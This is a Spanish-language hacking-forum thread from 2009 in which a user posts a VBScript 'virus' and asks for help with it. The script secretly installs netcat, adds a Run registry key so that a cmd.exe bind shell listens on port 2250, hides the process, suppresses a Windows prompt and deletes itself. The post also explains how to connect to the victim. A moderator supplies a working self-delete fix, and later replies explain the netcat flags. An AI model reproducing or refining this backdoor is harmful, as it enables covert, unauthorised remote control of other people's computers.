elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Programación
| |-+  Scripting
| | |-+  [Mi virus para entrar en otro ordenador][vbs]¿fallos?
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [Mi virus para entrar en otro ordenador][vbs]¿fallos?  (Leído 7,544 veces)
dvd3000

Desconectado Desconectado

Mensajes: 9


Ver Perfil
[Mi virus para entrar en otro ordenador][vbs]¿fallos?
« en: 17 Septiembre 2009, 20:25 pm »

Bueno este es mi virus (no sé si se dice troyano, gusano ,o como sea a un programita para entrar en otro ordenador)

Seguramente existen otras muchas formas, pero ami se me ha ocurrido esta:
se compone de dos partes, una son los archivos distribuidos a la victima,
la otra son los del hacker que quiere entrar.

1-parte
son dos archivos, uno de ellos es el nc.exe con nombre de Modo Consola.exe
y el otro es un vbs:
Código:
On Error Resume Next
nombre = wscript.scriptname
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
Set dirwin32 = fso.GetSpecialFolder(1)
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objfso = createobject("scripting.filesystemobject")
Objfso.movefile ".\ModoConsola.exe", dirwin32+"\nc.exe"
set wsc = createobject("wscript.shell")
wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WNet", "nc.exe -L -p 2250 -e cmd.exe"
Set correr = CreateObject("wscript.shell")
correr.Run "nc.exe -L -p 2250 -e cmd.exe", vbHide
Set objshell = createobject("wscript.shell")
wscript.sleep 20
Objshell.sendkeys "{ENTER}"
Set objfso = createobject("scripting.filesystemobject")
Objfso.deletefile ".\"+nombre
se supone que se tiene que autoborrar...

el nc.exe lo podeis descargar aquí:
http://ares.hotshare.net/download/wqeRcXDFHgDF/wqIUSaopopHgIUwqwqNM/9324929be1/96241/nc.exe

le cambiais el nombre a Modo Consola.exe

la otra parte, me la ahorro (solo son archivos que automatizan la entrada),
copiais el nc en c:\windows\system32 (con nombre nc.exe).
para entrar en el otro ordenador entrais en la consola de comandos y escribis:
nc.exe IP 2250
en IP poneis la ip del ordenador al que quereis entrar.
y entrareis en la consola de comandos del otro ordenador donde podeis modificar cualquier cosa.

Aver si me ayudais con el vbs, tengo un par de problemas por ahora que no sé solucionar:
1-No se autoborra
2-al ejecutarlo en otro ordenador sale el mensaje de windows de que se va a ejecutar un archivo, creo haberlo solucionado con el sendkeys...


En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: [Mi virus para entrar en otro ordenador][vbs]¿fallos?
« Respuesta #1 en: 19 Septiembre 2009, 01:39 am »

Citar
1-No se autoborra
Intenta con ..
Código
  1. objfso.deletefile wscript.scriptfullname

Citar
2-al ejecutarlo en otro ordenador sale el mensaje de windows de que se va a ejecutar un archivo, creo haberlo solucionado con el sendkeys...
En que sistema operativo lo estas ejecutando?


Lo has hecho tu o es copy/paste de varios sitios, entiendes lo que estas haciendo?

Citar
On Error Resume Next
nombre = wscript.scriptname
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
Set dirwin32 = fso.GetSpecialFolder(1)
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objfso = createobject("scripting.filesystemobject")
Objfso.movefile ".\ModoConsola.exe", dirwin32+"\nc.exe"
set wsc = createobject("wscript.shell")
wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WNet", "nc.exe -L -p 2250 -e cmd.exe"
Set correr = CreateObject("wscript.shell")
correr.Run "nc.exe -L -p 2250 -e cmd.exe", vbHide
Set objshell = createobject("wscript.shell")
wscript.sleep 20
Objshell.sendkeys "{ENTER}"
Set objfso = createobject("scripting.filesystemobject")
Objfso.deletefile ".\"+nombre

Que hace todo eso repetido?
Los objetos con que los declares una sola vez alcanza, con tener un solo objfso y un solo objshell es más que suficiente

Saludos



En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
dvd3000

Desconectado Desconectado

Mensajes: 9


Ver Perfil
Re: [Mi virus para entrar en otro ordenador][vbs]¿fallos?
« Respuesta #2 en: 20 Septiembre 2009, 18:00 pm »

sé lo que hago, están repetidos porque tengo un montón de plantillas y si, las voy copiando.
lo ejecuto en windows xp
¿pasa algo si  se repiten?, si va mas lento lo cambio ahora mismo

objfso.deletefile wscript.scriptfullname
Yo había puesto solo Scriptname, parece que funciona.
gracias.
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: [Mi virus para entrar en otro ordenador][vbs]¿fallos?
« Respuesta #3 en: 20 Septiembre 2009, 19:41 pm »

En realidad si .. declaras varias veces un objeto en memoria, la perdida de rendimiento practicamente no se ve, pero existe

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
markus_bitman

Desconectado Desconectado

Mensajes: 33


Ver Perfil
Re: [Mi virus para entrar en otro ordenador][vbs]¿fallos?
« Respuesta #4 en: 25 Enero 2010, 00:46 am »

Citar
On Error Resume Next
nombre = wscript.scriptname
Set fso = WScript.CreateObject("Scripting.Filesystemobject")
Set dirwin32 = fso.GetSpecialFolder(1)
Set objFSO = CreateObject("Scripting.FileSystemObject")
Set objfso = createobject("scripting.filesystemobject")
Objfso.movefile ".\ModoConsola.exe", dirwin32+"\nc.exe"
set wsc = createobject("wscript.shell")
wsc.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\WNet", "nc.exe -L -p 2250 -e cmd.exe"
Set correr = CreateObject("wscript.shell")
correr.Run "nc.exe -L -p 2250 -e cmd.exe", vbHide
Set objshell = createobject("wscript.shell")
wscript.sleep 20
Objshell.sendkeys "{ENTER}"
Set objfso = createobject("scripting.filesystemobject")
Objfso.deletefile ".\"+nombre



Disculpen muchachos, sera que me pueden decir donde obtengo informacion acerca de esta linea de programacion: correr.Run "nc.exe -L -p 2250 -e cmd.exe", vbHide  parece que significa ejecutar el archivo de manera oculta pero quisiera entender el porque -L -p 2250? son comandos NetCat? -e? que es eso?

Saludos
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: [Mi virus para entrar en otro ordenador][vbs]¿fallos?
« Respuesta #5 en: 25 Enero 2010, 00:48 am »

Exacto, ejecuta el comando de manera oculta, y todo lo que esta entre comillas es lo que se va a ejecutar, por lo que las opciones que comentas son parámetros del netcat

Saludos
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
[L]ord [R]NA


Desconectado Desconectado

Mensajes: 1.513

El Dictador y Verdugo de H-Sec


Ver Perfil WWW
Re: [Mi virus para entrar en otro ordenador][vbs]¿fallos?
« Respuesta #6 en: 25 Enero 2010, 17:04 pm »

Con esa ultima pregunta que el hace verdaderamente se ve que copio el codigo de algun lugar

1) Las que estan en Azul las declara 3 veces, pudiendo hacer todo lo que hizo con una sola.
2) CreateObject("Scripting.FileSystemObject") es declarado 4 veces de los cuales solo utiliza 2.

verdaderamente si tu fuiste que lo hiciste deberias de reorientarte y aprender a programar antes de empezar a hacer esto, ademas por definicion esto no entra en una definicion de virus, entraria en backdoorear un ordenador con netcat, una herramienta detectada como una HackingTool por muchas empresas antivirus.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Un virus en mi ordenador?
Seguridad
Faol 1 1,746 Último mensaje 12 Octubre 2012, 21:03 pm
por Stakewinner00
¿Virus que intenta entrar?
Seguridad
Proweb 8 3,736 Último mensaje 1 Marzo 2014, 13:28 pm
por Proweb
Otro de mis fallos :(
.NET (C#, VB.NET, ASP)
luis456 8 3,579 Último mensaje 25 Septiembre 2014, 03:06 am
por luis456
No me funciona el codigo de entrar en otro ordenador ajeno con metasploit
Hacking
Drakaris 1 3,140 Último mensaje 26 Agosto 2016, 18:18 pm
por MCKSys Argentina
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines